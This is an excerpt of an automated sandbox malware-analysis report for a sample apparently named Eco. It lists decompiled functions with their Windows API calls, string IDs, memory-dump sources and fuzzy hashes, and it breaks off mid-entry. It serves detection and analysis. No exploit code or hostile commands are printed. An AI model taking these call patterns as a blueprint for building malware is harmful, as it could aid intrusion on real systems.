                          • Opcode Fuzzy Hash: 16806fdfeb2ca4651e64af31750200d698b5a4937d76b1f431fe6a5d3b694675
                          • Instruction Fuzzy Hash: 5A41D8705447C9EEFF308664A8043B5BEE17B16344F08E459D6CD561C2EBA45DC8A7A2
                          Function 0058886D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00514D37: __itow.LIBCMT ref: 00514D62
                            • Part of subcall function 00514D37: __swprintf.LIBCMT ref: 00514DAC
                          • CoInitialize.OLE32 ref: 005888B5
                          • CoUninitialize.OLE32 ref: 005888C0
                          • CoCreateInstance.OLE32(?,00000000,00000017,005A3BBC,?), ref: 00588920
                          • IIDFromString.OLE32(?,?), ref: 00588993
                          • VariantInit.OLEAUT32(?), ref: 00588A2D
                          • VariantClear.OLEAUT32(?), ref: 00588A8E
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                          • API String ID: 834269672-1287834457
                          • Opcode ID: d544067c20d072866a1d55498a50fb792c87ec068171088d5b97232de04765ed
                          • Instruction ID: d815419122a185c5b92dd1311880596d1568956855037f1dff04ef75821f91fa
                          • Opcode Fuzzy Hash: d544067c20d072866a1d55498a50fb792c87ec068171088d5b97232de04765ed
                          • Instruction Fuzzy Hash: 16616B70608702AFD711EF54D849B7ABBE8FF89714F404809F985AB291DB70ED48DB92
                          Function 0057B973 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                          Download Yara Rule
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 0057B980
                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0057B9F6
                          • GetLastError.KERNEL32 ref: 0057BA00
                          • SetErrorMode.KERNEL32(00000000,READY), ref: 0057BA6D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Error$Mode$DiskFreeLastSpace
                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                          • API String ID: 4194297153-14809454
                          • Opcode ID: fb443d3f33ca68a5f566e20a1732acc63e49e16a8d90a49cd9e258488aa6d466
                          • Instruction ID: 63e34c2fa91608d1b0985a3bb2cb840d584553304d29fbf63772d0267ef9b375
                          • Opcode Fuzzy Hash: fb443d3f33ca68a5f566e20a1732acc63e49e16a8d90a49cd9e258488aa6d466
                          • Instruction Fuzzy Hash: 1F318235A00205AFDB00EF64E889FAEBFB4FF55304F108159E80997291EB719D45EB91
                          Function 0057334A Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 82windowCOMMON
                          Download Yara Rule
                          APIs
                          • LoadIconW.USER32(00000000,00007F03), ref: 005733E9
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: IconLoad
                          • String ID: ,j]0j]$,j]0j]$blank$info$question$stop$warning
                          • API String ID: 2457776203-1862109651
                          • Opcode ID: 6f43b1fb13a607c71af60f4c15db777e0b027f1da6ec9c97dd31fa790b07a66a
                          • Instruction ID: 0eaf4ffa644ca4c0ffc6920f0281144f562a6ce0abfcdc1b71c00d612fa2a807
                          • Opcode Fuzzy Hash: 6f43b1fb13a607c71af60f4c15db777e0b027f1da6ec9c97dd31fa790b07a66a
                          • Instruction Fuzzy Hash: 6411383134870BFEEB254A54BC4ADAA7F9CFF15330F10805AF508A61C2DAB59B40B264
                          Function 0056992A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                            • Part of subcall function 0056B57D: GetClassNameW.USER32(?,?,000000FF), ref: 0056B5A0
                          • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 005699AF
                          • GetDlgCtrlID.USER32 ref: 005699BA
                          • GetParent.USER32 ref: 005699D6
                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 005699D9
                          • GetDlgCtrlID.USER32(?), ref: 005699E2
                          • GetParent.USER32(?), ref: 005699FE
                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00569A01
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                          • String ID: ComboBox$ListBox
                          • API String ID: 1536045017-1403004172
                          • Opcode ID: b654c5e2fe8c4c35af4ffbea0c1ab25bdf5893b32145512676537b200043af2a
                          • Instruction ID: 49b1e6c01f47eb6944cd80c460a0036b1b1095382d11a09baacfcd68ccbbb191
                          • Opcode Fuzzy Hash: b654c5e2fe8c4c35af4ffbea0c1ab25bdf5893b32145512676537b200043af2a
                          • Instruction Fuzzy Hash: 4921B074A00205AFDF04ABA0CC99EFEBFA9FFA6300F100116F961932D1DB754929DA60
                          Function 00569A15 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                            • Part of subcall function 0056B57D: GetClassNameW.USER32(?,?,000000FF), ref: 0056B5A0
                          • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00569A98
                          • GetDlgCtrlID.USER32 ref: 00569AA3
                          • GetParent.USER32 ref: 00569ABF
                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00569AC2
                          • GetDlgCtrlID.USER32(?), ref: 00569ACB
                          • GetParent.USER32(?), ref: 00569AE7
                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00569AEA
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                          • String ID: ComboBox$ListBox
                          • API String ID: 1536045017-1403004172
                          • Opcode ID: cabc5ba2a5335a82387fdcbaa59b132d906d2c1c25e3776afb5439a9c618386a
                          • Instruction ID: df0ea8eedf89fa211a22066c9dbc1d97d3ba13e0d641a1d29d4cb39d5fb5c18c
                          • Opcode Fuzzy Hash: cabc5ba2a5335a82387fdcbaa59b132d906d2c1c25e3776afb5439a9c618386a
                          • Instruction Fuzzy Hash: CC21AF74A40109BFDB04ABA4DC89EFEBFA9FFA6300F100116F951972D1DB754929DB60
                          Function 00569AFE Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetParent.USER32 ref: 00569B0A
                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00569B1F
                          • _wcscmp.LIBCMT ref: 00569B31
                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00569BAC
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ClassMessageNameParentSend_wcscmp
                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                          • API String ID: 1704125052-3381328864
                          • Opcode ID: 4587008e70221cfe3e02123e551da0bf09da6cf8910daaf3204ec4ac5a3411f5
                          • Instruction ID: 7ae6bcca164534a98d9b99e9a4006679c4141f3a88d4fd4e2d75af471bb67ce3
                          • Opcode Fuzzy Hash: 4587008e70221cfe3e02123e551da0bf09da6cf8910daaf3204ec4ac5a3411f5
                          • Instruction Fuzzy Hash: 7B11E37664C307FEFB242A24EC0AEB63F9CFB55324F200116F904B60F2EEB268515515
                          Function 00588D5D Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                          Download Yara Rule
                          APIs
                          • VariantInit.OLEAUT32(?), ref: 00588D89
                          • CoInitialize.OLE32(00000000), ref: 00588DB6
                          • CoUninitialize.OLE32 ref: 00588DC0
                          • GetRunningObjectTable.OLE32(00000000,?), ref: 00588EC0
                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 00588FED
                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,005A3BDC), ref: 00589021
                          • CoGetObject.OLE32(?,00000000,005A3BDC,?), ref: 00589044
                          • SetErrorMode.KERNEL32(00000000), ref: 00589057
                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 005890D7
                          • VariantClear.OLEAUT32(?), ref: 005890E7
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                          • String ID:
                          • API String ID: 2395222682-0
                          • Opcode ID: 78e21959007f92bffebebe71d8ec90123edbac240ab6581a1255c1cf71c5ce7c
                          • Instruction ID: 6ccf9ce54c6b7d547f0437074aff2ee3863b8ec407c869dd90a10205a074b313
                          • Opcode Fuzzy Hash: 78e21959007f92bffebebe71d8ec90123edbac240ab6581a1255c1cf71c5ce7c
                          • Instruction Fuzzy Hash: ACC13571208305EFD700EF64C88492ABBE9FF89348F04491DF989AB251DB71ED45CB92
                          Function 00571839 Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 0057185B
                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,005708D3,?,00000001), ref: 0057186F
                          • GetWindowThreadProcessId.USER32(00000000), ref: 00571876
                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,005708D3,?,00000001), ref: 00571885
                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00571897
                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,005708D3,?,00000001), ref: 005718B0
                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,005708D3,?,00000001), ref: 005718C2
                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,005708D3,?,00000001), ref: 00571907
                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,005708D3,?,00000001), ref: 0057191C
                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,005708D3,?,00000001), ref: 00571927
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                          • String ID:
                          • API String ID: 2156557900-0
                          • Opcode ID: 3c9fe83d11f58431573af3d9578547302dd2daa14eb0fffe008ec993f73cd797
                          • Instruction ID: 14d3d72cd0c3b1f34aa5a83e4b2d9d2cb3f109b0f82c81923a7cd85e082e4a9d
                          • Opcode Fuzzy Hash: 3c9fe83d11f58431573af3d9578547302dd2daa14eb0fffe008ec993f73cd797
                          • Instruction Fuzzy Hash: 2B31D571501619AFEB319F18EC48F793FADFB69311F108016F908DB290E7749D89AB54
                          Function 0054C013 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetSysColor.USER32(00000008), ref: 0051260D
                          • SetTextColor.GDI32(?,000000FF), ref: 00512617
                          • SetBkMode.GDI32(?,00000001), ref: 0051262C
                          • GetStockObject.GDI32(00000005), ref: 00512634
                          • GetClientRect.USER32(?), ref: 0054C02C
                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 0054C043
                          • GetWindowDC.USER32(?), ref: 0054C04F
                          • GetPixel.GDI32(00000000,?,?), ref: 0054C05E
                          • ReleaseDC.USER32(?,00000000), ref: 0054C070
                          • GetSysColor.USER32(00000005), ref: 0054C08E
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                          • String ID:
                          • API String ID: 3430376129-0
                          • Opcode ID: fb3236fb7ac74611e0d4258902eb41b65168adbb9b7b96477be00ba6512e3944
                          • Instruction ID: 8b34f0a16d3ec16f6dce3d8ee84b33eaeed8338a5079ed928d5558c64fc6070c
                          • Opcode Fuzzy Hash: fb3236fb7ac74611e0d4258902eb41b65168adbb9b7b96477be00ba6512e3944
                          • Instruction Fuzzy Hash: 06114931511205AFEB616FA4EC08BE97F72FB6A325F104225FA25950E1CB3109A5FF11
                          Function 0056AB4C Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                          Download Yara Rule
                          APIs
                          • EnumChildWindows.USER32(?,0056AF1D), ref: 0056AE5B
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ChildEnumWindows
                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                          • API String ID: 3555792229-1603158881
                          • Opcode ID: b6d7527c4d86f325aa5a4e4fec0287f33efde911bbe22d738ed404a1b0ca1ce9
                          • Instruction ID: 7877d597972e88b39d06ed71e6d780f012edbd69dc0250c8b3170491c5295f6a
                          • Opcode Fuzzy Hash: b6d7527c4d86f325aa5a4e4fec0287f33efde911bbe22d738ed404a1b0ca1ce9
                          • Instruction Fuzzy Hash: 71917F70600606AACB08EF60C486BFAFFB9BF95340F508119E85AB7291DF316D59DF91
                          Function 005131F6 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                          Download Yara Rule
                          APIs
                          • SetWindowLongW.USER32(?,000000EB), ref: 0051327E
                            • Part of subcall function 0051218F: GetClientRect.USER32(?,?), ref: 005121B8
                            • Part of subcall function 0051218F: GetWindowRect.USER32(?,?), ref: 005121F9
                            • Part of subcall function 0051218F: ScreenToClient.USER32(?,?), ref: 00512221
                          • GetDC.USER32 ref: 0054CFA3
                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0054CFB6
                          • SelectObject.GDI32(00000000,00000000), ref: 0054CFC4
                          • SelectObject.GDI32(00000000,00000000), ref: 0054CFD9
                          • ReleaseDC.USER32(?,00000000), ref: 0054CFE1
                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0054D06C
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                          • String ID: U
                          • API String ID: 4009187628-3372436214
                          • Opcode ID: 5577645265e147a9c6288f0ea4172aeac1f0d0d13dfe0929d5279f41f925984f
                          • Instruction ID: 2e05a1b35946064ea11e42c9977dcbdc2e34ecd8e2cf3b698c9f307a85a43997
                          • Opcode Fuzzy Hash: 5577645265e147a9c6288f0ea4172aeac1f0d0d13dfe0929d5279f41f925984f
                          • Instruction Fuzzy Hash: 4471E230501205EFCF219F64C888AFA7FB1FF89318F14426AED595B1A6D7318C86EB60
                          Function 005890F8 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,005A0980), ref: 005891DA
                          • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,005A0980), ref: 0058920E
                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00589388
                          • SysFreeString.OLEAUT32(?), ref: 005893B2
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Free$FileLibraryModuleNamePathQueryStringType
                          • String ID:
                          • API String ID: 560350794-0
                          • Opcode ID: 4dc62ef3b148afe2af48fce9efc629ea097a539a423e5c5d9c3bb9bc3b6440f1
                          • Instruction ID: 480330184bfb53bfe090a1d816d9cdde5cb4d3ab2b29badcc8ba0b2760ff74dc
                          • Opcode Fuzzy Hash: 4dc62ef3b148afe2af48fce9efc629ea097a539a423e5c5d9c3bb9bc3b6440f1
                          • Instruction Fuzzy Hash: A4F10B75A00109EFDB14EF94C888EBEBBB9FF85314F148458F915AB291DB31AE46CB50
                          Function 0058FB45 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 0058FB66
                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0058FCF9
                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0058FD1D
                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0058FD5D
                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0058FD7F
                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0058FEFB
                          • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0058FF2D
                          • CloseHandle.KERNEL32(?), ref: 0058FF5C
                          • CloseHandle.KERNEL32(?), ref: 0058FFD3
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                          • String ID:
                          • API String ID: 4090791747-0
                          • Opcode ID: f75594b2357480cf25aac94bf34b833beb1f37075c79c8f61a71b203bb621263
                          • Instruction ID: 2a1fbe6a98d44e5d394b81f878d8aa4a5d80f1c71ed26f93d384f3a5ed3f3b82
                          • Opcode Fuzzy Hash: f75594b2357480cf25aac94bf34b833beb1f37075c79c8f61a71b203bb621263
                          • Instruction Fuzzy Hash: 66E1A1312047029FDB14EF24D495A6ABFE5BF89310F14896DF8899B2A2DB31EC45CF52
                          Function 005750E9 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00574A30: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,005739F7,?), ref: 00574A4D
                            • Part of subcall function 00574A30: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,005739F7,?), ref: 00574A66
                            • Part of subcall function 00574E59: GetFileAttributesW.KERNEL32(?,00573A6B), ref: 00574E5A
                          • lstrcmpiW.KERNEL32(?,?), ref: 00575168
                          • _wcscmp.LIBCMT ref: 00575182
                          • MoveFileW.KERNEL32(?,?), ref: 0057519D
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                          • String ID:
                          • API String ID: 793581249-0
                          • Opcode ID: 1304674039f3dd79d6dd6d2ce910d0280b0ce4a3457ff3f5288dcc5dd61f3a5b
                          • Instruction ID: 8871fd2c1bdddbe984b91c4b6180f523afdbb9cdc19c777618729fc0e1dc5c44
                          • Opcode Fuzzy Hash: 1304674039f3dd79d6dd6d2ce910d0280b0ce4a3457ff3f5288dcc5dd61f3a5b
                          • Instruction Fuzzy Hash: E45183B24087859BC724EB90D8859DFBBDCBFC5300F40492EF689D3151EF70A6889756
                          Function 00598A32 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                          Download Yara Rule
                          APIs
                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00598AEC
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
